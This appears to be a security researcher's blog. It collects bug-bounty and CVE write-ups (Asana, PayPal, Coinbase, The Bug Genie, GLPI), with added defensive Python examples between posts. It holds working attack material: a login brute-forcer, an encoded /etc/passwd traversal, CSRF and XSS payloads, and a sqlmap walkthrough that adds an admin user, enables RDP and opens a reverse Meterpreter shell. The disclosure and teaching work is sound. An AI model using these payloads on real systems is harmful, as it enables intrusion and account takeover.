Wednesday, October 9, 2013

Hijack User accounts via cached Invite links! #Asana #bugbounty

A few weeks back a friend of mine told me about Asana's bug bounty program. Although I did not see any mention of reward money on their security page, I still thought of giving it a try. After reading a little about the company I found that www.asana.com is a portal where a team can share resources and organize its work, i.e. a kind of project management software.
I created an account and started poking around, checking for obvious vulnerabilities such as XSS and CSRF. The application appeared to be decent, but there is always some scope for a few logic vulnerabilities.
The application allowed creation of new projects, followed by addition of new users by sending them invite links.
These invite links looked like this (https://app.asana.com/app/asana/-/register?invite=XXXXXX), so I thought of trying my luck with them.


By using a few Google dorks I was able to get a list of invite links which had been cached by Google, and to my surprise they were still active.


So I collected a list of cached invite links and tried creating an account, and voila!! it worked smoothly, as I expected. I was able to log in to a valid user account by creating a new password.





I reported this issue to the Asana security team and they were very quick in responding to my emails. The issue got fixed in no time and they rewarded me for it.
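The root cause here is that an invite link stayed valid indefinitely and for whoever held it, so a copy sitting in a search-engine cache was as good as the original e-mail. As an added example, not Asana's code and not part of the original post, here is the token lifecycle a registration endpoint should enforce, in Python: random tokens stored only as hashes, bound to the invited address, expiring, and burned on first use. The store itself, the seven-day lifetime, the `now` clock hook and the sample addresses are assumptions made for the example.

```python
import hashlib
import secrets
import time

INVITE_TTL = 7 * 24 * 3600  # assumed lifetime: an invite dies after seven days


class InviteStore:
    """Hypothetical server-side invite store (an assumption, not Asana's implementation).

    Tokens are kept only as SHA-256 hashes, so a database leak does not hand out
    usable links, and each record carries the e-mail it was issued to, an expiry
    and a redeemed flag, so a link that leaks (for example into a search-engine
    cache) cannot be used by someone else, later, or twice.
    """

    def __init__(self, now=time.time):
        self._now = now      # injectable clock so expiry can be exercised offline
        self._records = {}   # sha256(token) -> record

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, email):
        """Create a single-use invite for `email` and return the raw token for the link."""
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG; not guessable
        self._records[self._key(token)] = {
            "email": email.lower(),
            "expires": self._now() + INVITE_TTL,
            "redeemed": False,
        }
        return token

    def redeem(self, token, email):
        """Consume the invite if it is valid for `email`; return True on success.

        Every failure path returns the same False, so the caller learns nothing about
        whether the token exists, has expired or belongs to another address.
        """
        rec = self._records.get(self._key(token))
        if rec is None:
            return False
        if rec["redeemed"] or self._now() > rec["expires"]:
            return False
        if rec["email"] != email.lower():
            return False
        rec["redeemed"] = True  # burn it: a cached copy of the link is now worthless
        return True


def cached_link_scenario():
    """Replay the report: one link used once legitimately, then again from a cache,
    plus a fresh link that is left unused until after it expires."""
    clock = [1_000_000.0]
    store = InviteStore(now=lambda: clock[0])
    token = store.issue("invitee@example.com")            # constructed sample invitee
    first = store.redeem(token, "invitee@example.com")    # the invitee registers
    second = store.redeem(token, "invitee@example.com")   # someone replays the cached link
    fresh = store.issue("late@example.com")
    clock[0] += INVITE_TTL + 1                            # a week passes
    expired = store.redeem(fresh, "late@example.com")
    return first, second, expired
```

Looking the record up by its hash is safe because the token is random and long; the hash only protects against a leak of the store itself. Serving the registration page with an `X-Robots-Tag: noindex` header keeps crawlers from archiving it, but only the single-use and expiry checks make an archived copy harmless.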

Tuesday, October 1, 2013

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended, I thought of writing my own simple login brute-forcer in Python using Requests. There are a lot of brute-forcing scripts out there, but I thought of writing my own.
I love the Requests library for Python; as the author says, "It's HTTP for Humans", and it actually is. I really encourage using this library at least once if one wants to start learning web scraping in Python.
I have also used the BeautifulSoup library to extract a few HTML tags. The website I have used is http://www.testfire.net, which is a deliberately vulnerable bank application developed by IBM for web app testing.
The script brute-forces all the passwords in a list against a single user name, "admin". I initially tried writing it with cookiejar, but somehow the code got a little lengthy; then Requests came to my rescue.
The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin". With the Requests library it is possible to route the request through an intercepting proxy before it hits the server; here I am running a proxy on port 8082 just to see what data my script is sending. Feel free to use the script (for learning purposes only); here is the gist link.

#Author: Prajal Kulkarni
import sys
import requests
from bs4 import BeautifulSoup as BS

# Route traffic through a local intercepting proxy (Burp/ZAP on 8082) to watch what is sent
proxyDict = {"http": "http://127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url, m):
    # Submit one login attempt; a successful login renders the "MY ACCOUNT" link
    t = requests.post(url, data=m, proxies=proxyDict)
    print(t.text)
    soup = BS(t.text, "html.parser")
    a = soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string) if a is not None else ""   # the link is absent when the login failed
    print(x)
    if x == "MY ACCOUNT":
        print("The pass is " + m['passw'])
        sys.exit()
    else:
        print("Password %s not working" % m['passw'])

def controller():
    # One candidate password per line; blank lines are skipped
    with open('password.txt', 'r') as f:
        passwords = [line.strip() for line in f if line.strip()]
    for passw in passwords:
        m = {"uid": "admin", "passw": passw, "btnSubmit": "Login"}
        print(m)
        connect(url, m)

controller()



Wednesday, September 25, 2013

Arbitrary File Upload in Paypal's http://apps.paypal.com

This was one of many vulnerabilities that I found in http://apps.paypal.com as part of their bug bounty program. This is one of their developer portals; it was hosted on Apache/2.2.22 and running Drupal 7. I reported this issue to PayPal on May 19, 2013.
Here are some of the details of the bug:
After logging into the portal we can create applications suited to the developer environment, and as part of this it allowed uploading supporting files (Ad Hoc files required for mobile app submissions). I uploaded a simple "txt" file and it generated an external link to the file (https://apps.paypal.com/system/files/test_###.txt).


The upload allowed all types of extensions (*.jpg, *.txt, *.gzip, *.php, *.jar, *.exe etc.) and didn't validate them on the server end. I tried uploading a simple PHP shell, but sadly it didn't work :(.
I then tried the "XSS via SWF upload" technique blogged by Soroush Dalili (see his post for more details). I uploaded the "xssproject.swf" file and got an external link (https://apps.paypal.com/system/files/xssproject.swf).
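Two things made this exploitable: the server trusted the client-supplied file name, and the file was then served back from the apps.paypal.com origin, where a SWF runs with that origin's privileges. As an added example, not PayPal's or Drupal's code and not from the original post, here is a Python validation routine for such a "supporting files" upload, together with the headers to serve stored files with. The extension allowlist, the magic numbers it checks, the random storage name and the sample files are assumptions made for the example.

```python
import os
import secrets

# Assumed allowlist for a "supporting files" upload: extension -> (magic bytes, Content-Type).
# An empty magic means "no fixed signature"; such files must at least be valid UTF-8 text.
ALLOWED = {
    ".txt": (b"", "text/plain"),
    ".jpg": (b"\xff\xd8\xff", "image/jpeg"),
    ".png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".pdf": (b"%PDF-", "application/pdf"),
}

# Signatures of active content that must never be stored under the application's origin,
# whatever the name says: Flash (uncompressed, zlib and LZMA SWF) and PHP source.
ACTIVE_MAGIC = (b"FWS", b"CWS", b"ZWS", b"<?php")


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return (storage_name, content_type) for an acceptable file or raise UploadRejected.

    The decision uses both the extension and the file's own bytes: a .txt that begins
    with a SWF header is refused, and so is a .jpg whose bytes are not a JPEG.
    """
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    magic, content_type = ALLOWED[ext]
    head = data[:16]
    if any(head.startswith(sig) for sig in ACTIVE_MAGIC):
        raise UploadRejected("active content disguised with a harmless extension")
    if magic and not head.startswith(magic):
        raise UploadRejected("file content does not match its extension")
    if not magic:
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            raise UploadRejected("text upload is not valid UTF-8") from None
    # Never keep the client's name: a random one cannot be guessed and cannot carry a
    # second extension (shell.php.txt) for a misconfigured web server to act on.
    return secrets.token_hex(16) + ext, content_type


def accepts(filename, data):
    """Boolean wrapper around validate_upload for quick checks."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def download_headers(storage_name, content_type):
    """Headers for serving a stored upload: browsers must download it, never render it."""
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{storage_name}"',
        "X-Content-Type-Options": "nosniff",   # no MIME sniffing into something active
        "Content-Security-Policy": "sandbox",  # even if rendered: no scripts, no origin
    }
```

Magic-byte checks do not stop polyglots (a valid JPEG with a SWF or PHP payload appended), which is why the headers matter as much as the validation: with `attachment` and `nosniff` a stored file is never interpreted in the application's origin, and the usual next step is to serve uploads from a separate domain altogether.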

The vulnerability was fixed immediately after it was reported to the security team.
Happy hunting!! cheers!!

Tuesday, June 4, 2013

SSRF/XSPA Bug in https://www.coinbase.com

This was one of the bugs which I reported to Coinbase.com on May 1, 2013 as part of their bug bounty program. Although I started quite late in hunting, I was lucky enough to find one interesting vulnerability in their "Merchant_settings" portal.

The vulnerability is an SSRF/XSPA, which allows an attacker to use the application as a proxy to scan for services on other servers on the internet. In layman's terms, this vulnerability can be abused to port-scan other servers, with the requests coming from Coinbase's infrastructure rather than from the attacker.

Here is the POC that I submitted to Coinbase. I used "scanme.nmap.org", which is known to have ports 22 and 80 open.
In "merchant_settings" there was a field where a URL could be entered for receiving instant payment notifications. The server fetched that URL and displayed whatever the remote server sent back, without any validation of the target or of the response, so this functionality allowed things like banner grabbing, port scanning and identifying web application frameworks.


Here is an example of an open port (22) on "scanme.nmap.org", which returned the OpenSSH version banner.
#http://scanme.nmap.org:22/index.html




Here is what I received on entering a closed port (2243):
#http://scanme.nmap.org:2243/index.html



This functionality could have been abused in many ways; one of them would be automating the attack and making multiple requests to remote servers on well-known ports. The Coinbase security team has already fixed this vulnerability, but I was quite disappointed when I received a bounty which was less than the minimum bounty they had promised on their responsible disclosure page, i.e. a payout of 5 BTC.
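What turned a webhook setting into a port scanner was the combination of a free choice of host and port with the raw response being shown back to the merchant. As an added example, not Coinbase's code and not part of the original post, here is a Python validator for such an instant-payment-notification URL, and the only result the UI should display about a delivery. The https-only/443-only policy, the injectable `resolve` hook (so the check can run against a constructed DNS table instead of real lookups) and the sample host names are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}   # assumed policy: notifications are delivered over TLS only
ALLOWED_PORTS = {443}         # fixed port: nothing left to scan


def is_public_address(ip):
    """True only for globally routable unicast addresses (IPv4 or IPv6)."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_notification_url(url, resolve=socket.gethostbyname):
    """Return (normalised_url, pinned_ip) or raise ValueError.

    `resolve` maps a host name to an IP; it is a parameter so the policy can be
    tested offline. The IP is returned so the delivery code connects to the
    address that was checked, not to whatever the name resolves to later
    (DNS rebinding).
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme must be https")
    if parts.username or parts.password:
        raise ValueError("credentials in the URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or 443          # parts.port itself raises ValueError on a bad port
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port {port} is not allowed")
    try:
        ip = str(ipaddress.ip_address(host))   # a literal address was given
    except ValueError:
        ip = resolve(host)                     # a name: resolve it once, here
    if not is_public_address(ip):
        raise ValueError("host resolves to a non-public address")
    return parts.geturl(), ip


def is_acceptable(url, resolve=socket.gethostbyname):
    """Boolean wrapper around validate_notification_url."""
    try:
        validate_notification_url(url, resolve)
        return True
    except (ValueError, OSError):
        return False


def delivery_summary(status_code):
    """The only thing the merchant UI should show about a delivery attempt.

    Neither the response body nor a connection-error message is passed through, so
    the page can no longer be used to read banners or fingerprint frameworks. The
    one remaining bit, delivered or not, is what a merchant needs to debug their
    endpoint. `status_code` is None when the connection failed.
    """
    return {"delivered": status_code is not None and 200 <= status_code < 300}
```

Port and scheme are checked before the name is resolved, so an attacker-supplied host never even triggers a DNS lookup unless the rest of the URL is acceptable; the pinned IP should be passed to the HTTP client (with the original host name kept for TLS verification) rather than letting the client resolve the name again.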
The security team responded saying "We can't be sure of how this vulnerability could affect our coinbase users, and we issue bounties for only those vulnerabilities which affect our userbase". Anyway, I can't say I wasn't disappointed, but yes, they should have delivered what they had promised on their responsible disclosure page.

Wednesday, March 20, 2013

Local File Inclusion Vulnerability in bugs.owncloud.org - CVE-2013-1761


Last year, when I was looking for vulnerabilities in owncloud.org, I came across a Local File Inclusion vulnerability in one of the subdomains of owncloud.org.

A little more insight on LFI:
It is a vulnerability which lets an attacker read files that are present locally on the server (any file the web server process has read permission on); when the included file is interpreted rather than just read, it also amounts to execution of code loaded from that file. The attack becomes serious when the application can be made to read files outside the web root, which is done with sequences like ../../../../../../ or their URL-encoded form ..%2F..%2F..%2F..%2F. These traverse out of the web root and give access to the rest of the file system.
A PHP LFI example:
<?php
$test = $_GET['id'];
if (isset($test)) { include("pages/$test"); }
else { include("index.php"); }
?>
In the above example the id parameter is not sanitized to filter out traversal sequences like "..%2F", so it is easily possible to include any file stored on the system outside the web root; and because include() executes any PHP code it finds, a file the attacker can write to (a log, an upload) becomes code execution.

Now, coming back to ownCloud: the website was bugs.owncloud.org and there was a parameter named "files=" which would fetch the requested file from the server. The parameter value was not validated at the server end, so it was pretty simple to read any local file the web server had read permission on.

Vulnerable URL: http://bugs.owncloud.org/thebuggenie/serve&g=css&files=

The "files" parameter took a base64-encoded value which was decoded at the server end. So I encoded ../../../../../../etc/passwd as Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== and accessed "http://bugs.owncloud.org/thebuggenie/serve&g=css&files=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==", which read out /etc/passwd from the server.
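The PHP snippet above and the Bug Genie `files=` parameter fail in the same way: a user-controlled name is joined onto a directory and handed to the file system without checking where it ends up. As an added example, not code from The Bug Genie or ownCloud and not part of the original post, here is the decoding and path-resolution logic in Python, with the vulnerable resolution beside a hardened one that serves only bare stylesheet names. The CSS directory path and the `.css`-only rule are assumptions.

```python
import base64
import binascii
import os

CSS_DIR = "/var/www/thebuggenie/css"   # assumed location the g=css handler serves from


def decode_files_param(value):
    """Decode the base64 `files` value; None if it is not valid base64 or UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def vulnerable_resolve(value):
    """The behaviour the report describes: join the decoded name and use it as-is."""
    name = decode_files_param(value)
    if name is None:
        return None
    return os.path.normpath(os.path.join(CSS_DIR, name))


def safe_resolve(value):
    """Accept only a bare *.css file name and prove the final path stays inside CSS_DIR."""
    name = decode_files_param(value)
    if not name or "\x00" in name:
        return None
    # A stylesheet name has no directory part at all, so reject the whole class of
    # traversal inputs instead of trying to strip "../" sequences out of them.
    if "/" in name or "\\" in name or name in (".", ".."):
        return None
    if not name.endswith(".css"):
        return None
    base = os.path.realpath(CSS_DIR)
    full = os.path.realpath(os.path.join(base, name))
    # Defence in depth: realpath follows symlinks, so a planted link inside CSS_DIR
    # that points outside it is caught here even though the name looked harmless.
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def encode_files_param(name):
    """Build the parameter the way the client sends it."""
    return base64.b64encode(name.encode("utf-8")).decode("ascii")
```

The base64 wrapper is what defeated any naive filter on the raw parameter: a check for "../" or "..%2F" in the query string never sees the decoded value. Validation has to happen on the decoded name, and the final realpath check is what holds even when a future change relaxes the name rule.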

I reported the vulnerability to ownCloud and they replied saying it's an issue with "The Bug Genie". Lukas Reschke helped me get in touch with the Bug Genie developers. They realized the criticality of the bug and quickly rolled out a fix within a week, and the issue was assigned the CVE id "CVE-2013-1761". They also acknowledged my contribution in their new software release here.

I also want to thank Lukas Reschke for helping me get a CVE id.

Tuesday, October 16, 2012

Multiple CSRF and XSS vulnerabilities in GLPI - CVE-2012-4002/CVE-2012-4003

A few months back, when I was researching resource management software, I came across this amazing resource manager (GLPI). After deploying it on my XAMPP server I started my initial phase of finding bugs.
The installed version of GLPI was 0.83.2, which I found to have multiple CSRF issues; some important functions, including adding new users or raising a ticket, lacked proper CSRF mitigation.




I found that most of the user-related tasks were vulnerable to CSRF. Here is a small POC on adding a new user. The page at http://<localhost>/glpi/front/preference.php allows us to add a user.



After clicking on update, the following POST request is sent to the server.


POST http://localhost/glpi/front/preference.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Cookie: PHPSESSID=bstsomr0qf11n0446gqai8gp03
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update

Since there is no CSRF token in the POST request, an attacker can easily craft an HTML page and send it to a logged-in administrator; the browser submits the form with the administrator's session cookie, so the change is made without the administrator knowing about it.





HTML POST-CSRF example:

<html>
<body onload=csrf.submit()>
<form id="csrf" name="csrf" action="http://localhost/glpi/front/preference.php" method="POST">
<input type=hidden name="name" id="name" value="glpi"/>
<input type=hidden name="id" id="id" value="2"/>
<input type=hidden name="realname" id="realname" value="Attacker"/>
<input type=hidden name="language" id="language" value="en_GB"/>
<input type=hidden name="use_mode" id="use_mode" value="0"/>
<input type=hidden name="update" id="update" value="Update"/>
</form>
</body>
</html>




Here are a few more locations which did not have CSRF protection:

http://localhost/glpi/front/user.form.php?id=3
http://localhost/glpi/front/user.form.php?id=2
http://localhost/glpi/front/user.form.php?id=5
http://localhost/glpi/front/user.form.php?id=4
http://localhost/glpi/front/user.form.php?new=1
http://localhost/glpi/front/profile.form.php?id=3
http://localhost/glpi/front/ruleimportcomputer.form.php
http://localhost/glpi/front/popup.php?popup=edit_bookmark
http://localhost/glpi/front/group.form.php
http://localhost/glpi/front/entity.form.php
http://localhost/glpi/front/popup.php
http://localhost/glpi/front/auth.settings.php
http://localhost/glpi/front/crontask.php?execute=*
http://localhost/glpi/front/fieldunicity.form.php
http://localhost/glpi/front/config.form.php
http://localhost/glpi/front/notificationmailsetting.form.php
http://localhost/glpi/front/*?reset=reset
http://localhost/glpi/front/backup.php?


Apart from CSRF, the application also had an XSS flaw at http://localhost/glpi/front/config.form.php, where there is an option to provide text shown on the login page. This parameter was not sanitized on the back end and accepted any malicious characters: a simple "><script>alert(1)</script> would pop up 1 on the login screen.






The GLPI security team was very prompt and cooperative in handling all my reported issues, and a few weeks back they came out with a new secure version, GLPI 0.83.3, with XSS and CSRF protection.

Thanks to the GLPI team for acknowledging me in their new software release (click).





Monday, October 8, 2012

SQL Injection made simple

SQL injection has ruled the OWASP Top Ten for many years. It is the most powerful and feared vulnerability of all. It is "THE BAAP" of all living vulnerabilities found till date, so finding it and then exploiting it sometimes becomes a challenge. There are zillions of ways to identify it, but exploiting it the right way can be a challenge for a pentester.
Here is an easy method, from beginner to expert level, for SQL injection exploitation using my favourite tool, sqlmap.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

A SQL injection attack is one in which SQL commands are injected into the data plane (user-supplied input) in order to change the execution of the application's predefined SQL statements.
SQL injection can lead into :
a) DBMS data manipulation
b) File system read and write access
c) Operating system control
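To see what "injected into the data plane" means before pointing sqlmap at it, here is an added example, not from the original post and not sqlmap's code, of the kind of login query sqlmap's payloads target, in Python against an in-memory SQLite database: the string-concatenated version next to the parameterised one, and a boolean-based blind loop that recovers a password the way sqlmap's blind technique does, one true/false answer at a time. The users table and its rows are constructed sample data (passwords are stored in clear only to keep the demonstration short).

```python
import sqlite3
import string


def make_db():
    """Constructed sample schema: two users; passwords in clear for the demo only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("test", "test")])
    return conn


def vulnerable_login(conn, username, password):
    """Control and data in one string: whatever the user types becomes part of the SQL."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised: the DBMS receives the statement and the values separately,
    so a quote in the input is only ever data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_recover_password(conn, user, alphabet=string.ascii_letters + string.digits,
                           max_len=32):
    """Boolean-based blind extraction through vulnerable_login.

    The application only answers "logged in" or "not logged in", yet that single
    bit is enough: each probe asks whether one character of the stored password
    equals a guess, and the trailing -- comments out the real password check.
    """
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"{user}' AND substr(password, {pos}, 1) = '{ch}'--"
            if vulnerable_login(conn, probe, "anything"):
                found += ch
                break
        else:
            break   # no guess matched: we have run past the end of the string
    return found
```

sqlmap's boolean-based technique is this loop with a binary search over character codes instead of a linear scan, and with a payload shape that closes the quote (the `AND 'sdFw'='sdFw` in the output further down) instead of a comment. The fix is the parameterised query; input filtering on its own is what sqlmap's tamper scripts exist to get around.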

SQLMAP - http://sqlmap.sourceforge.net
INTRO>>         An open source command-line tool
                Detects and exploits SQL injection flaws in web applications
                Developed in Python (first released July 2006)

KEY FEATURES>>  Full support for MySQL, PostgreSQL, Oracle, MSSQL

TECHNIQUES>>    Boolean-based blind
                Error-based
                UNION query
                Stacked (batched) queries
                Time-based blind

It does an extensive back-end DBMS fingerprint and enumerates users, passwords, databases, tables and columns.

Disclaimer: Please do not test it on any live website without prior permission of the website owner. The author assumes no liability and is not responsible for any damage caused. I recommend hosting Mutillidae/WebGoat/DVWA on a virtual machine to practice. (I have used Mutillidae to explain beginner-level exploitation (more info on Mutillidae can be found here); for the advanced level I have used a custom web application designed by our team, webmart (aspx/mssql).)

Prerequisites>> BackTrack 5 (www.backtrack-linux.org)


Here we go!!

One of my favourite combinations of switches to start with:

a) python sqlmap.py -u "http://abc/mutillidae/index.php?page=login.php" --level=3 --forms --batch --banner --flush-session

This fetches many things: the back-end database, the banner, and it also searches the page for forms and tests whether any of their parameters are injectable. As shown below, the database is MySQL 5.0, the parameter username is injectable, and the platform is PHP 5.3.3 on Apache 2.2.16. Woooaaa! that's a lot of info on the first run.


b) python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dbs --batch

Here we are providing the POST data (username=test&password=test&login-php-submit-button=Login) and telling sqlmap to enumerate the databases and their tables, using the default answers without asking for user input (--batch). The current database user is 'root@localhost'. Here we have a lot of info to understand the back end of the application.

A few more ways to dump the database:

python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dump-all -D "database to enumerate" --batch






Enumerate table Columns:

python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --columns --batch

If the table and column names cannot be enumerated from the DBMS metadata (for example on MySQL below 5.0, which has no information_schema, or when the injected user lacks the privileges to read it), brute forcing the names from sqlmap's wordlists is the fallback. For a brute-force check:
python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --common-tables --common-columns --batch

These are some of the easy ways to exploit SQL injection. Now, raising the bar a little, we will try exploiting a Windows system running MSSQL 2005. On MySQL and PostgreSQL sqlmap uploads a shared library (a DLL on Windows) and uses it to create two user-defined functions, sys_exec() and sys_bineval(), inside the database; on Microsoft SQL Server it instead relies on the xp_cmdshell extended stored procedure, which is what the run below uses. xp_cmdshell is enabled by default on MSSQL 2000 and disabled by default on 2005 and 2008, but it can be re-enabled with the sp_configure stored procedure if the current session user is a member of the sysadmin role [works fine on MSSQL 2005/08], and sqlmap attempts exactly that when the current user turns out to be a DBA.

Here our final aim is to own the Windows box hosting a web application (webmart) [aspx/mssql], but before that we will do some very awesome things with sqlmap.

Check if the remote system has RDP enabled:
python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --batch

If the value is 0 then RDP is enabled; if it is 1 then it is not. If it is 1, we can enable RDP remotely using sqlmap!

Enabling RDP using sqlmap:
python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0 --batch

Create users on the system using operating system commands:
 python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-cmd="net user newadmin test /add" --batch

And finally, to pwn the remote system, we use --os-pwn:

 python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-pwn --batch

 Output:

     sqlmap/1.0-dev-cc3f387 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual  consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:44:12

[17:44:13] [WARNING] you did not provide the local path where Metasploit Framework is installed
[17:44:13] [WARNING] sqlmap is going to look for Metasploit Framework installation into the environment paths
[17:44:13] [INFO] Metasploit Framework has been found installed in the '/usr/local/bin' path
[17:44:13] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:44:13] [INFO] testing connection to the target url
[17:44:13] [INFO] sqlmap got a 302 redirect to 'http://abc:80/Errorpage.aspx'. Do you want to follow? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test' AND 2076=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (2076=2076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(106)+CHAR(112)+CHAR(58))) AND 'sdFw'='sdFw&password=test&Login=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=-7964' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(58)+CHAR(73)+CHAR(121)+CHAR(81)+CHAR(121)+CHAR(109)+CHAR(103)+CHAR(90)+CHAR(89)+CHAR(110)+CHAR(79)+CHAR(58)+CHAR(99)+CHAR(106)+CHAR(112)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=test&Login=Login

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test'; WAITFOR DELAY '0:0:5'--&password=test&Login=Login

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test' WAITFOR DELAY '0:0:5'--&password=test&Login=Login
---
[17:44:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:44:13] [INFO] how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[17:44:13] [INFO] testing if current user is DBA
[17:44:13] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[17:44:16] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[17:44:17] [INFO] testing if xp_cmdshell extended procedure is usable
[17:44:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:44:44] [INFO] the SQL query used returns 8 entries
[17:44:44] [INFO] retrieved: " "
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:45] [INFO] xp_cmdshell extended procedure is usable
[17:44:45] [INFO] creating Metasploit Framework multi-stage shellcode
[17:44:45] [INFO] which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
[17:44:45] [INFO] which is the local address? [xyz]
[17:44:45] [INFO] which local port number do you want to use? [37597] 37597
[17:44:45] [INFO] which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[17:44:45] [INFO] creation in progress .................................................................... done
